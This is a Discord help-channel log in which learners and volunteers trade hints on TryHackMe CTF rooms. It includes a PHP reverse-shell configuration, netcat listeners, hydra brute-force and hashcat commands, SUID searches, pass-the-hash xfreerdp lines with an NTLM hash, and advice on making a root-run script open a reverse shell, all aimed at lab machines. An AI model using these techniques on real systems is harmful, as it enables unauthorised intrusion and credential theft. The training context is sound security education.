#room-hints

"warning: failed to daemonise. this is quite common and not fatal. connection refused (111)

what port did you set in the rev shell???

80

.......

that looks like not rev shell code

yeah that would be bad

try and use a port above 1024 port number

as anything lower then that needs administrator/root perms to be used

i had it on 1234 and 9999 before and same error message

do you have a firewall up somewhere???

not on the VM

I guess that's preety obvious, but check if you have the right ip address on your php rev shell

again. the .php5 file

that is the line that pentest monkey:s php revshell outputs in the window on the website when you navigate to the php file to spawn the shell

but the last part is some clear error

i saved the file and that is content of the file

i tried to use the default .php extension it was not allowed for upload it was allowed for the .php5 . I changed the port to 1048 and nc'd that port and curled and same results

i just used my ,php5 on that machine rootme and it worked for me

shadow used phtml instead of php5

dunno why shadow prefers phtml

i tried with php5 and phtml, both worked. Verify that you have your THM ip on the $ip variable

if phtml is a file extension ill give it a try

php-reverse-shell.php5 the http://10.10.98.0/uploads/php-reverse-shell.php5 it's a incorect file contant

As shadow said before, you can use whatever port you want above 1024 without super user privileges.

set_time_limit (0);
$VERSION = "1.0";
$ip = '10.10.33.184';  // CHANGE THIS
$port = 1234;       // CHANGE THIS
```  is what shadow used on their attackbox.... but of course that ip should be changed for your own attack machine ip

let me guess it's not working

ok so mine looks like yours but with my information I dont have any changes except with the nc i get a "cant access tty;job controll truned off" message now

can you post pic of php-reverse-shell.phmtl that is on you local file. not uploaded one

@chrome hull If it looks like this, then you got your shell.

oh then I have my shell then XD

run python -c 'import pty; pty.spawn("/bin/bash")'

you did get rev shell ?

https://prnt.sc/1eYtu0EUqk5N

or did you mean the actual shell from the terminal ?

did you manage get the shell back?

@ebon jewel

@ebon jewel https://prnt.sc/1xykHnW-zpg8

that is it

same as mine

yeah if you get a $ in the terminal while running nc -lvnp 1234 with a blinking cursor at the end you got a shell

from there you stabilise the shell and get going

sry. my writting skills today are crap today. bit awake to loong

it is fine ralex

lots of missunderstandings above

was confused my the content of the rev shell file =/ yea

Thank you @alpine kestrel @fathom dome @ebon jewel

Gave +1 Rep to @alpine kestrel

+rep @fathom dome

Gave +1 Rep to @fathom dome

will get back on getting that last rep point to ralex in 5 mins

+rep @ebon jewel

Gave +1 Rep to @ebon jewel

aww

that works too

thanks sickb0y

Shadow, you're from sweden right? Ever listened to Bathory??

do not recognise that band name no

when you exmine the contact-msg. the right side of you pic. does anything stands up as answer/flag

Gave +1 Rep to @ebon jewel

im searching for files with SUID permissions is " find / type -f -user root -perm -u=s 2> /dev/null " not the correct command for this?

what room

rrootme

you are close for sure. bit wrong command but close

I found it thank you @ebon jewel

Gave +1 Rep to @ebon jewel

my goto command is find / -perm -u=s -type f 2>/dev/null

Hello guys, i'm doing a VM , having a hard time trying to priv escalate.

Can't find a way to do it, would some one please analyze the linpeas output and maybe give me a tip of what way should i go?

hi guys am a newbie here,trying to do my introduction to cyebersecurity,i am at intro to offensive security,however i cannot tell how to access the next room,kindly assist

I believe i did.

But i am even struggling to send the screenshot i took using the snipping tool,still trying though

any advice on why my hydra command isnt working : https://prnt.sc/mfVL9QL6Si62

there is no rockyou.txt , have you recently installed kali? unzip the file

oh... much better... is not 'wordlist', is 'wordlists'

with letter 's' at the end

Enterprise room. Anyone knows what that error is? Can't dump the hash

i see i left the S off thank you

Gave +1 Rep to @hot tusk

hi, am doing the cat pictures 1, and right now am inside the internal shell service through nc, and because its in restricted environment i can't perform most commands, and i have seen on binary (i guess) in the user profile too, but can't access/execute it.
tried to transfer it, but still the same error cant exeute in this shell.
if someone gave hint, that would be helpful for me.
https://tryhackme.com/room/catpictures

For the dynamic analysis: debugging room, I cannot seem to figure out task 2 q1. It asks what kind of analysis technique is being avoided by malware checking timing stuff. I assume the answer is something along the lines of sandboxing/virtualization analysis. Am I on the right track?

I am starting Island Orchestration and I am guessing I am suppose to port scan. Evey time I port scan from other labs, it crashes. Is there any nmap command that these labs like more ? 🙂

Hello

And what do I need to verify myself?

!docs verify

follow the steps in that link @short steppe 🙂

Hello I'm trying to complete the OWASP top 10 2021 room and I'm stuck in task 15

I have spotted the vulnerability but I can't find a way to print the flag to the screen

Bookstore RCE?

Yes yes

I tried to output the file's contents with iframe and then with php and didn't work

I couldn't figure out how to do it with JavaScript either

for context:I want to get the contents of /opt/file.txt

Hi there, I have gone through most of these recently and want to help as much as I can, hopefully without giving the answer. 😊
Starting from the top:
So you have the exploit now. What do you do with it?
If you have the correct exploit, try executing it, does anything stand out relating to ‘usage’ error? This may give you a hint as to how you are suppose to execute the file properly. Also, remember what IP address and port you are attempting to exploit.

Once it executes properly on your target, and it appears that you have attained RCE, use the command to list out the path/read contents of the flag file. Do you know what that command is?🧐 😉

I think I'm missing the last piece of the puzzle

I think I just need a command that outputs the content of a file in console or alert window or the page itself

I might do more google searching in a bit

I could be assuming too much, and I apologize if I am either confusing or steering you in the wrong direction, but you could potentially have a different setup or went a different route than me.
I am using the THM provided AttackBox, and was able to perform this all from 1 terminal window. If you get to a point where you have achieved RCE privileges on the target via a terminal window, there is a simple command that I was able to use to display the contents of the needed file. 😺 😉

Ohhhh I got mixed-up with the terminologies I have a XSS vulnerability

nice to meet you all

I ll try to figure it out by myself then thanks for the hints

OK, sorry that I could not help, but I will add that if you are on the OWASP Top 10 - 2021 Task 15 Vulnerable and Outdated Components - Lab , there is an exploit that can be found while searching through Exploit-DB. Happy hacking!

Yh it's okay I just found another exploit about xss

And I thought I had found the correct one

anyone else doing overpass3 and having trouble uploading their shell via ftp? I've logged in via ftp using the user credentials, changed directories over to backups and used put ~/Downloads/payload.sh.php and keep getting an error saying it could not create the file. Looked at walkthroughs and nobody else is gettin that error. my shell is correct as well, anything i try sending using the put command doesn't work.

Hi,
Sitting with the "Crackthehash" room
https://tryhackme.com/room/crackthehash

And can't get hashcat to find it with the rockyou.txt
Becomes "Status: Exhausted"

Which task?

Sorry, last task.

PrivateBin of the output and command.

||https://paste.offsec.com/?bca2ee2ad4c45422#afXHJlrf37qUy2NVVI2w+wIg+rIORoaVb2IrEopPEYk=||

I guess I must be missing something, any hits 🙂

!docs verify

Can you verify and paste t eimage in here, I don't want to click a link.

urlscan

I shouldn't have to.

One moment

https://tenor.com/view/i-apologize-rudy-ayoub-thats-my-bad-forgive-me-im-sorry-gif-26205392

Think I'm verified but can't add images :/

You're not verified

oh ok

Can't DM the bot as per the inscructions.

You need to open up your DM's to the server.

You're privacy settings are blocking the bot.

There we go!

Thank you @lucid junco

Gave +1 Rep to @lucid junco

Are you doing task 1?

No, the last one.

had an Idea it was my mashine but same problem on the AttackBox

it's TASK 2-4

Which room.

?

@lucid junco any idea about my problem. 🙂

I can encode it the otherway with that SALT but not crack it.

In the beginner training for operating system security, can some one finding the password for the user johnny? It doesnt seem like I can upload a screenshot

This room introduces users to operating system security and demonstrates SSH authentication on Linux.

where do I find !docs verify?

!docs verify

!docs verify

Okay now I can paste screenshots. Am in this begineer room stuck here:

For the life of me I cant see anywhere on how to find a password for johnny username

Based on the top 7 passwords

Use the list given in Task 2.

ah okay thanks

Gave +1 Rep to @lucid junco

how can i post screen shots here?

!docs verify

Follow the link.

is this hashed password with this salt sat up correct in hash file?

i've waited fot hours!

What's your syntax?

what can I use to examine this file in this challenge? radare?
https://tryhackme.com/room/0x41haz

The message I get when running it is

-> r2 0x41haz.elf
ERROR: Cannot find 'Unknown or unsupported arch' asm/arch/anal plugin. See rasm2 -L or -LL
ERROR: Cannot find 'Unknown or unsupported arch' asm/arch/anal plugin. See rasm2 -L or -LL
ERROR: Cannot find 'Unknown or unsupported arch' asm/arch/anal plugin. See rasm2 -L or -LL
 -- That's embarrassing.
[0x00010000]> 

https://tryhackme.com/room/crackthehash

This is going to take a considerable amount of time to crack, even on your host OS. Use hashcat with the sha512crypt format (1800), specify attack mode 0 and wait.

if you still have issue. what command did you use for it

How are you running it? r2 ?

I just found the solution, I had to do something before running it with r2

Ghidra? >.>

||test||

Test succeeded.

spoiler: ||hexedit and edited MSB to LSB|| then it ran ok in r2

ghidra would work too though

Ah!

yep

Did it run ok then?

yeah

as the description said there was some anti-measure for reversing - that was it

crack the hash 1

hashcat.exe -a 0 -m 1800 hash.txt rockyout.txt --force

a waited for a long time, after that the crack stared and after some seconds it stopef and gave me error like this memory cpu cant take it something like that, but i know it is my laptop, it cant handle it.

!docs verify

I'm a novice, anyone has an address for the dark web, I'd like to know about it. i will thank him

Yes, it's at https://admin.tryhackme.com/portal?location=dark

Anyone can help me with Madness room ? I have 1 question

oh, one of my favourite rooms!

yes, it's very nice ^^ i'm glad I managed to finish it ^^

damn it 🤦🏻‍♂️. you got me.

I nearly ended like the mad hatter after hours not understanding whats going on their 😄 But I loved it and after getting in PrivEsc was quiet easy... But to the question, i found sth. like: "for i in {start_port..end_port}; do ssh some_options <ip> -p "$i"; done" quiet enlightening

https://en.wikipedia.org/wiki/List_of_Tor_onion_services
https://tails.boum.org/

OK, thanks

Gave +1 Rep to @strong lance

pls guys i need help with a room have been stock for some hours now, the title of the room is "walking an application" under JR Pentesting, Task no: 3,
i just cant figure out the real ACME IT SUPPORT website to get the flags from.

You need to start the machine in task 1,

im trying to use hydra to get into a FTP port I have potential username but my hydra enumeration is a bit wonky I was curius if anyone knew if my commandline was missing anything? :
hydra -l maya -P /usr/share/wordlists/rockyou.txt ftp://10.10.28.133

looks good to me

you can specify how many threads you want it to run with -t, default is 16 for ftp

so would it be hydra -t 16 -l then the rest ?

well if you put it to 16 it doesnt matter, but you could to hydra -l maya -P wordlist.txt -t 32 ftp://127.0.0.1 to use double the threads

especially for ssh bruteforcing in CTFs it can be helpful, hydra defaults to 4 (slow) threads with a warning that more can confuse the ssh service, but I usually run it with -t 20 without a problem and its much faster

oh wow thank you

Gave +1 Rep to @peak grotto

is this speed normal ? [STATUS] 308.57 tries/min, 2160 tries in 00:07h, 14342253 to do in 774:40h, 18 active

looks fine I think? I haven't had to bruteforce many ftp logins, you can probably crank up the threads even more but if you haven't gotten it by now you and this is a ctf then you are probably on the wrong approach

I dont have it yet and this does look like the wrong approach lol

is it a ctf? They are usually tuned that if you do have to bruteforce it shouldn't take too long with a standard password list (usually not more than 5min or so). Sometimes you have to use a custom wordlist or have some information about password policy to filter out passwords that dont meet a certain criteria

or maybe there is another user

Which room are you doing?

"startup"

its suppose to be this absolute basics of CTF from the description

Ah!

I remember this one.

You're wasting your time with Maya

🙂 plz dont say bc you can anon login on ftp

Bingo!

sec afk crying

Don't you nmap things? lol

lmao poor guy

nmap was the very first thing i did and i cant seem to get a solid response

What's your ip?

" All 1000 scanned ports on 10.10.167.172 are in ignored states.
Not shown: 600 closed tcp ports (reset), 400 filtered tcp ports (no-response)"

target machine or vpn ip ?

please how can i use Kali linux to run the exiftool for the letter-image.jpg and not the Attack box

You need the letter on your kali machine.

You can't exiftool a file that isn't there.

I ran nmap -sV -v and got that error I posted ill try your line and see if i get better results

exiftool is on Kali by default...

how can i get the fil on my kali linux

though, i jave used jimpl.com to find answer to the question

You can download it from the task, and transfer it via python server, drag and drop, or a shared folder if you VM supports it.

ok..thanks

please how do i transfer it via python server...

spin up the attackbox, CD to the directory and spin up a python server

python3 -m http.server

Then on your VM

wget http://machine_ip/filename

thanks so much..i really appreciate

hello everyone, this was taken from the Autopsy room , task number 7 "What self-assuring message did the 'Informant' write for himself on a Sticky Note? (no spaces)" when i enter the answer , it say it is incorrect , does anyone else experience this?

Stupid question how do you connect to the https://tryhackme.com/room/enumerationpe linux machine. SSH port is open but I have no idea what the password and username to connect to the machine.

Am I meant to get initial access by hacking something before I even begin with the room?

I'm confused.

Hahahahaha never mind the login credentials where at the bottom of the room.

Saves brute forcing it with hydra.

I cant seem to figure out why my netcat will not run. any advice is much appreciated https://prnt.sc/J3amh9IhFBv4

i've reinstalled it and updated everything but idk whats causing this

Try -lvnp

it worked should the ip show all 0's though ?

No?

Can you show me?

https://prnt.sc/uPPssFMokplU

That's just listening on any

I still got the reverse shell so i guess it doesnt matter ?

oh

You can specify the ip.

thank you

Gave +1 Rep to @lucid junco

im downloading a .pcapng file to go over logs in wireshark but it keeps saving it as 'index.html' even after scheme specified is there a way to address this? i've looked online for what i could be doing wrong and hit a wall

It looks like you're saving the actual web page?

Where are you downloading it from?

the direct path once i reverse shell into it and located the path it was ' wget ftp://10.10.155.51 /incidents/suspicious.pcapng '

I tried it wont let me use get

Is it because you have a space beteern 51 / ?

" No command 'get' found, but there are 18 similar ones " your guess is as good as mine

if i dont have a space i get an error

Screenshots are king.

https://prnt.sc/q1hpqll4Ol1e

yes

no but my target machine timed out so ill have to start over

thank you

Gave +1 Rep to @dusk totem

I dont have permission to move the file

https://prnt.sc/PnARLfpEG9gd

Can anyone please help with the throwback network?

idk how long finding it will take just wanted to let you know lol

im cd'd to the ftp directory is the mv line i presented correct or does it need to be adjusted bc of the pwd ?

What room are you doing?

🙂 startup

Oh.

Do you know how to move it?

don't use mv.

use cp

same line just copy instead of move?

you might need to type out the full pwd

so

cp /incidents/suspicious.pcapng /var/www/html/files/ftp

i'd go with /html/files/ftp over /srv/ftp ?

Yeah.

https://prnt.sc/qNk9GNTbYfSR

Are you in the directory of the of the pcapng?

no im in the ftp directory

That would be why, you need to be in the directory of the pcapng to move it.

It will have more than /incidents/.. etc in there

ok sec

im guessing it timed out. im going to reset the shell connection : https://prnt.sc/9pXmwcT4BZ8s

it doesnt show in the directory anymore https://prnt.sc/47c161DuAIoy

Network services 2 Task 3. The nmap scan we are told to do. how long does it take? ive been waiting for 15 minutes and it hasnt moved. Does it actually take this long? Is my laptop that slow or does it actually just take long

Usually nmap scans take 15mins at most for rooms in my experience. You can speed this up by adding the switch --min-rate 10000 keep in mind that increasing the speed might miss things but I have found that this rate is usually pretty good for rooms. Also adding -vv nmap will output each port as it scans it so you can see if it freezes

hey guys

i issued several times the same issue with room wreath regarding connecting with rs_ida

hi, was wondering if anyone could provide a hint for the tomghost room

I got the user flag but I'm a bit stuck on escalating privileges to get root

sudo -l

Thne GTFO bins.

sounds good, I'll take a look there. thanks!

Gave +1 Rep to @lucid junco

doing https://tryhackme.com/room/adventofcyber4 day 9 and I can't quite get why the answer for CVE seems to be a bug that is exploitable on versions prior to 8.4.2, whereas the application has version 8.26.1

also: where does this ip come from?

Cracking hashes can take a very long time and are very hardware dependent. How many hash per second is yours running at?

Oh ya that's going to take ages I suggest that if you already have it running for this room I would just look the hash up since its a hardware limitation slowing your learning down. That room is more meant to show you how to crack a hash and your command will work its just a matter of time

Ya it might be that you need to use the other version of hash algorithm. Sometimes the first option that you try isnt correct and you have to try multiple to get it to crack

Okay then its just a matter of time but also that particular hash is able to be found from https://hashes.com/en/decrypt/hash there hash table contains the answer

Ya no problem you wont always find hashes there but it cant hurt to check hashes you find on those quick as it can take a while to crack certain hash algos

nudge for "AWS API Gateway"?

Is this on the new AWS path?

ye @lucid junco

You might not get help with that path in here, as most of the volunteers don't have access.

trying my luck lol

hello,

I don’t see how to access the admin page in the OWASP room Top 10 - 2021 > Task 22, bonus question.

Do either of you have a clue?

Feel free to send me a DM. 🙂

Hey, thanks for responding, already figured it out 🙂

Gave +1 Rep to @hexed crescent

Hello could someone help me with giving me a hint with a CTF challenge? It’s with wireshark a

And trying to filter for passwords

You're welcome, glad to hear you figured it out. 🥳

Is this a tryhackme room?

Hey everyone. I am stuck on finding the flag for the Snapped Phishing Line room. I've read through the forum hints but still can't figure out where the flag is. A hint would be appreciated

Yes it is!

||Check the subdirectories for the URL of the attackers domain. Think of what you would call a flag file and file extension you would use.||

You can shoot me a DM if have a question or want a hint on a room. If I have done it I can try to help or maybe I can start the room.

yes I just moved it to the ftp directory and downloaded it from there and it was ezpz from that point

Hello, I'm stuck in the Networking Room, Enumerating SMB. I cant figure out what sticks out as someting interesting to invesitgate. What happened to the youtube walkthroughs? Did I not run a good nmap scan? Do I have to download enum4linux to complete this section?

Has anyone completed Insekube room ?

The "interesting" something you want to investigate is one of the file shares, use enum4linux with the -S option to list the ones available on the machine.

eugh enum4linux

outdated stuff that barely works

smbclient can easily replace it

I have not but I will start it quick. What's your questions about the room like which task are you having issues with?

Thank you for replying
I have doubts in the final task where i need to break out of the pod to get the root flag.

Gave +1 Rep to @high harbor

hello guy, am stuck on a task at the jr pentesting room, i tried connecting openVPN to my kali machine but its giving this error "Options error: In [CMD-LINE]:1: Error opening configuration file:

please paste the command and full output

Linux PE ==> PE Capabilities lab : The flag file already has read permission for others and it can be viewed even without escalating privileges. Bug?

That error usually means you need to specify the path the where you have the .ovpn located at. If you aren't sure what it needs to be navigate to where you have the file and run pwd will show the full path

Working on Madness room (https://tryhackme.com/room/madness), was wondering what the next step I can do after getting the secret? There was a disclaimer that bruteforcing is not required so I wanted to know what technique I can try. I seem to be looking for a username.

How can I connect tryhackme account on discord? can you help me?

https://help.tryhackme.com/en/articles/6495858-discord

ok ı do

thx

This is one of my favourite rooms!

Where are you in the room?

I am trying to enumerate users at the moment. I already tried looking for hidden directories, tried to look for hidden files, etc.

So.. the start?

No. I already have the secret, so I'm looking for a user.

I already learned something from it and I haven't even got the initial access.

Have you found the ||secret directory|| ?

Yes, including the || parameter value ||

Did you get ||the number|| ?

Yes.

Yes

And this is where you're stuck?

I got some random value, I tried to check if its a hash or encoded text, but it isn't so I'm assuming its a password.

Yeah, it's something. 😄

I can give you a nudge, or a hint.

Yes please. Is it the password? If not, I'll try to check again.

You're not finished with the ||THM picture||.

I was thinking the same thing, but I already tried binwalk, steghide and stegseek. Even strings.

I'll check this again. Thanks!

Gave +1 Rep to @lucid junco

||steghide|| gave you nothing?

What syntax did you use?

I was stuck at the password

Just thought of using the value I got as the password to extract the hidden file.

I remember I also got stuck on the EasyPeasy room because of the exact same stage.

Thanks for the nudge!

Gave +1 Rep to @lucid junco

||The password you found should be the key||

Yeah, I just got it.

😄

you have one half of the cred.

Yeah.. time to look for hints again. At least I was able to move forward. Stuck on that part for hours.

https://tenor.com/view/cheshire-cat-alice-wonderland-smile-gif-12791280

"We're all mad here"

I just remembered that I'm also stuck at Wonderland. 😅

I should complete those unfinished ones first before starting new ones.

Bahaha!

wonderland was beautiful, good place to fall in rabbit holes (:

Yeah, stuck at the PE stage and looking at multiple options already.

Did you finish Madness?

Will take a stab at it again tomorrow if not today.

Not yet. Had to stop because of work.

Out of seeing you guys talk about Madness room I thought I would give it ago and I just got my foothold. I am so not trusting anymore haha

Good for you. Haha. At least you already have your foothold.

You got this. Just have to keep looking.

How are you getting on?

I need help

We might be able to help bud, you just need to tell us what it's concerned with.

I rest my password and can not log in my account

What sort of error do you have?

Hi, I would like to know if you can help me get access to my account. My phone with my 2FA App on got stolen and it didn't backup my 2FA Codes. Now I can not get back into my account and need to reset the 2FA. Please Help Me.

it was remove but can not login my account

you'll need to contact support.

!email

sharp en thanks

Still stuck on trying to get the password so I worked on different boxes first. 😅

Would you like another clue? 😄

I'll give it a shot again later today and tomorrow. I'm trying to define or document a mind map of some sort as there are things that I sometimes forget. I really need to up my enumeration.

https://www.rfc-editor.org/rfc/rfc793

Check the hint.

and I've literally given you the answer...

Gave +1 Rep to @lucid junco

Hi all, can I get a hint for PS Eclipse room, question 5?
I don't get what format is needed because in the flag place it is "Answer format: ** **********:**************************. / / ***************." but in the description it is (Format: User + ; + CommandLine) can I get clear descriprion or hint, please?

The format is just a copy paste of the information you found about the suspicious binary. ||<USER>;<CLI _Command>||. Put what you are thinking the answer is based off that.

Thing is, like let say, first part is question about"What permissions will the suspicious binary run as? " - this will be SA and there is a field to type in **(SA), but I will try what you suggested, maybe it helps because I see I got misled in to rabbit hole by my interpretation of description/question. Thank you for getting back.

I dont have the room booted up myself and I did this room a long time ago so not sure where you are getting the binary runs as "SA" I will give you if you want the User is that start of the command should be: ||NT AUTHORITY\SYSTEM||

Thank you, but won't look in to it now, will try myself to find out.

Gave +1 Rep to @high harbor

I actually booted the room up again for myself to jog my memory. The user isnt going to be found where the command is run but instead ||look at where the command was created|| this is a hint not giving directly the answer just where to look for it.

I've got the flag, just trying to connect bits why it's on that priviledge, because under user we don't see any run by the User that we have in the flag.

If you look at the create command of the task itself. You have to look back at the answer to question 4. If you break the command down and look at what each of the parameters its being feed you will come to ||/RU SYSTEM|| that switch is telling the task what to run as when executed

yes, you are right, thank you. I missed that part and where in logs searching for the execution log, now I get it

No problem happy to help. I am very rusty when it comes to Windows commands.

What else to get better with Splunk for BTLOv1 exam would you suggest to get in to:
Conti, New Hire Old Artifacts, Splunk 2, Splunk 3?

Let's say is there any grade, except (easy/medium)? or this is not the room to ask this?

For TryHackMe I have only done that PS Eclipse room for splunk related content. I would just suggest if that is something you want to learn more about just pick any of them. I am sure they each can teach you something diffrent with a bit of overlap. If you just search Splunk in the search tab under Learn it shows they have 9 rooms in total tagged as Splunk

yep, 4 left to go then. Will take "New Hire" then as I feel BoosV2 and V3 will be most hard

Hi, can I get clarification on what is needed under room "New Hire Old Artifacts" question number 3 is misleading me.
What was the name of the binary? - clear for me and I have answer.
What is listed as its original filename? - clear for me too.
(format: file.xyz,file.xyz) - clear too.
File path should include username in long name format. - what exactly would it mean?
Does it mean it should be ||C:\Users\FINANC~1\AppData\Local\Temp\Procmon64.exe|| or it should be ||FINANC~1\AppData\Local\Temp\Procmon64.exe|| or it should be for example ||Procmon64.exe,Procmon64.exe|| the biggest pain in the kidney for me is the way that flag format is requested to be, like task is easy but the time wasted is to understand and find out what flag format is requested to be able to move on.

UPD: 2:29 AM GMT. I've fought with an appropriate flag to be submitted and waisted on that 2h instead of task investigation. Task solved but mods, please, review how questions are stated and how "hints" can mislead. Thank you.

Mods aren't site staff.

Finally rooted the box. Retraced my steps at least 3x until I had nowhere else to look but that file.

I thought that was the best last lol

Hahaha. I already have an inclination to look at that file, but then said to myself that I must have missed something. I also thought of doing OSINT, but all I saw were links to writeups so that didn't help as well.

The room name was really suited to it.

Just got my first privesc, but from the looks of it, I'm guessing I may have to do at least 2 more privesc before I root the box.

I only remember that you need to go to the tea party 😄

I'm at that part at the moment 😅

hello

i am doing crack the hash

Hiya.

and currently trying to crack hash using hashcat but it has been running for ever!

Are you using the correct syntax?

hashcat -m 3200 "\$2y\$12\$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom" /usr/share/wordlists/rockyou.txt

i found out that mode should be 3200

and used this

do you think it is correct?

its just displaying hashcat is running and time estimated is 46 days!

have you done this lab already?

Yes, but it was faster on mine

did you use a different method?

I only have an i5 7th gen is that the reason?

Well, which question are you doing?

maybe my processor is shite

just need to crack this hash

$2y$12$Dwt1BZj6pcyc3Dy1FWZ5ieeUznr71EeNkJkUlypTsgbX1H68wsRom

https://tryhackme.com/room/crackthehash

why did you add the "$2y" ?

but its there in the original hash I didnt add anything

I always load my hashes in to a text file, and call that in the command

oh okay let me try doing that

thanks @lucid junco

Gave +1 Rep to @lucid junco

still the same :/

Yeah, it won't be immediatly...

ok ill give some time

thanks

Do you want a hint?

that would be help ful yes because i have been fiddling with this for hours now

use -a 3 ?l?l?l?l

This is will use a mask attack, and only search rockyou.txt for a 4 lettered undercase word.

oh i am using -a but thanks for the rest!

?1 - Undercase
?u - Uppercase
?d - digit (0-9)
?s - sepcial character
?a - all characters

Hello, I have an issue with a room… I’m supposed to scan some ports, but those who interest me are closed… so I can’t answer to the question

I can give more informations about the exact exercise

Which room and task?

Networks Services, Task3

I should see the ||SMB ports||, but since my scan showed me opened ports and those 2 are closed, I can’t advance
Plus I cant answer the first question, since I put the exact number of opened ports, and it’s still wrong

What ports are open when you scan?

Opened: ||80, 111, 389, 3389, 5901, 6001||

Filtered: ||7777, 7778||

I know the ||smb ports|| are ||139/445|| cause I googled it, but I want to see it and answer to the first question

Which machine are you scanning?

Can I have the IP please?

I scan the machine created on THM

IP: 10.10.154.229

You're scanning the wrong ip.

That's the attackbox

Press that button, "Start Machine"

When I try to click on « start machine », nothing happens and the timer begins

And you'll get a box up the top with an acive machine information

In there, that's the IP you "target"

Oh fuck

I forgot it

Im so dumb I’m really sorry

Now I have the good number of ports

Lol, no worries!

Thanks a lot! ❤️

Hi All,

Can some one help me with the Agent Sudo room. Zip file password question.( If facing an challenge while

1. I was not able to see the zip file when executing the binwalk for the cutie.txt.
2. I have checked that file has the wrong hex gradient. So i have change it even after that i was not able to find what the issue was. I could not able to find the zip file .

But when i check the image file using strings command i can see that there is an hidden file in the image.

Thanks in advance for the help.

try binwalk on the image

tq

Hi guys, in the unified kill chain framework, at what step the attacker gains the actual access to the system? Is it at exploitation?

Which task number?

hello

linux basics part 3 room apache2 file is not in my attackbox. Could you help me ?
Ben

Hello can you send any screenshot of the folder please N

You would probably have to cd to the /var/log/apache2 directory in the target machine.

anyone been doing forgotten implant im a little stuck .. i can see a request but unsure what to do with it

||base64||

hello
task2 of the Authentication Bypass module I enter the command required by the problem. The command can run completely, but no result is displayed. How do I solve the problem?

whats the command you're running?

Hey folks, question I am on Intro to Defense security: Task 3, I completed the task, but the question: What is the flag that you obtained by following along? I can't find it anywhere.

It's on the website you start with the green button.

need some hints on https://tryhackme.com/room/basicpentestingjt on enumerating users. From hint I know to ||leverage smb for enumeration||, so I do
||nmap --script smb-enum-users.nse -p445 <IP>|| but it returns no results. Also tried ||port 139|| but with no luck.

Hey y'all, Can someone give me a hint what can I do if I have .sh created by root and this .sh call script written by user?

Room ||"Startup"||

This means any code you put into the script that is called (user owned) will be executed by root when they run their original script

Just make sure to set permissions correctly

but when I try to spawn shell -- it spawns with user priv

Everyone should have a right to execute

Root should not only create the first script, but run it

Or you should run it as root

Unless it has SUID bit set

If you are the one running it -- you get a shell as you

hmm, so I should find the way how to execute it as root, maybe check cron or something like that

Thanks!

Gave +1 Rep to @honest wagon

Possible, cron

Or some binary calls it that you could sudo

Etc etc

Have to read through privesc in basic penetration testing soon

Basically, must force root run it, or find a way to do it yourself as root

And since root will be running it, don't just put bash there

That would spawn a shell for them, not u

Make them do some operation that would give you access

Reverse shell, changing permissions, etc etc

morning guys

my name is Benjamin need some help pls, i'm new to cyber and i'm having some challenges, I'll be glad if someone can be of help or as many lol

thank you in advance

what exactly are you looking for

@edgy agate thank you for getting back to me

Gave +1 Rep to @edgy agate

I'm having some challenges on defensive questions
What is the flag that you obtained by following along?

hey y'all i'm stuck on task 5 in local file inclusion #2. the VERSION_ID is 18.04 according to os-release but it's not taking that as an answer. did i miss something somewhere? 😫

I've been stuck on the MITRE room task 3.9, I can't seem to find what other group overlaps

nevermind, I just need to read the WHOLE page next time

i'm also now stuck on the challenge for task 8 in file inclusion, i don't quite understand LFI, and it seems like you need to have extra knowledge and/or tool experience to actually finish this challenge.

It's basically when the person can access files which r not supposed to be accessed on the webserver, usually this can be spotted when the "?foo=bar" something like this and bar is mostly in plain text or not encrypted

Is there a format in the answer ?

Happens because any input given is literally treated as trusted so If you were to put a local file into the url. It would literally give its output since there's nothing to check

Can somone help with the alfred room task 2 i am getting this error when trying to download my payload

Why is the file name rev-shelll.exe~

https://tryhackme.com/room/alfred

I dont know why I am getting 404 for and than it shows up

ignore I mistyped my msfvenom

Hi can someone help me in the daily buggle room. I am stuck. I found the password and connected but when I edit the index.php to a reverse shell in php and setup netcat I receive no shell even when I reload the page ten times

Ye, turns out the answer is outdated. Current ID is 18.04 but the "correct answer" is 12.04. Sounds like the ID updated but the answer didn't.

Hi, anyone that can give me a small hint on Pickle Rick?

Did enumeration, found username, but what next? DId i miss results in my enumeration or should i proceed on the next phase?

What task are you at

First one

Got a few steps further. Thanks for now 🙂

Ah I see

hy guys
a little hint for OSIRIS room

I created a new local administrator on the machine
i have turn off firewall and defender
change the ntlm password for chajoh user

but i cant login whit:

xfreerdp /v:10.10.118.53 /u:WINDCORP\\chajoh /pth:610b3d657797a3db5bbcde10dc28baaa /dynamic-resolution /cert:ignore

xfreerdp /v:10.10.118.53 /u:chajoh /pth:610b3d657797a3db5bbcde10dc28baaa /dynamic-resolution /cert:ignore

xfreerdp /v:10.10.118.53 /u:WINDCORP\\chajoh /p:"ChangeMe123#" /dynamic-resolution /cert:ignore

any idea/hint

& any idea where i can find this tool CQMasterKeyAD.exe?

sounds like you found a user that is not rdp enabled

a user said he was able to log in with that account but I'm starting to have doubts.
Assigned to Everyone the "Remote Desktop User"

the only user i had on machine

Administrator DefaultAccount gian
Guest scheduler WDAGUtilityAccount

but...I think I'm close to the solution
maybe you don't need to login as chajoh. once the keypass key has been recompiled, I should still be able to log in by passing the masterkey for keypass.

x) the only problem is that I have to find a way to replace the key

Now swap the old masterkey file with the new one and set the system and hidden attributes, see example

Hello. I've been trying to use SSH to access the room box from my attackbox and usually the password was tryhackme but now it doesn't work, is there a reason for this? I'm working on NNetwork services and SMB

You don't need to access via SSH for that box.

Not all rooms have ssh login.

Oh, okay. I am trying with the correct syntax of smbclient and I keep getting an error but looking up the error right now

Can I DM you for some help on this room? The forums on the site aren't really showing anything and the one post I found had nothing that really helped.

Hey all. Can anyone give me a hint for flag3 in Olympus. Got user flag and escalated to user from www user.

try to find unusual files which your user or users group has read permission and look where it leads you.

I'm attempting The Quest for Least Privilege, and Task 1 (question reads "If you are denied access while you have this policy, what type of policy is blocking you?") has me proper stumped. I'd be grateful for any hints as to where I should be looking.

I think not many folks can help as the AWS Path is limited to Business Users only, but there will surely be folks who can chime in.

Ah, damn, that makes sense. Thanks dude.

Peonnaly in the task text

kind of stuck in "year of the rabbit" room, got a directory from style.css and accessed it, it said the video contained some clue but it doesnt have anything interesting, source code has nothing interesting, and theres no hidden directories, nothing in cookies any idea what i am missing out?

not familiar with the room but do know that THM likes steganography so maybe run with that and see if any hidden info shows up

does the video contain morse code or something like that??

From memory, there is at least one hidden directory you can find with a tool like gobuster and a common directory list. The key, when you find it, is to continue enumeration recursively, then continue enumeration recursively, then continue enumeration recursively, then continue enumeration recursively, then continue enumeration recursively, ... After a while it will become obvious.

nah, its just rickroll

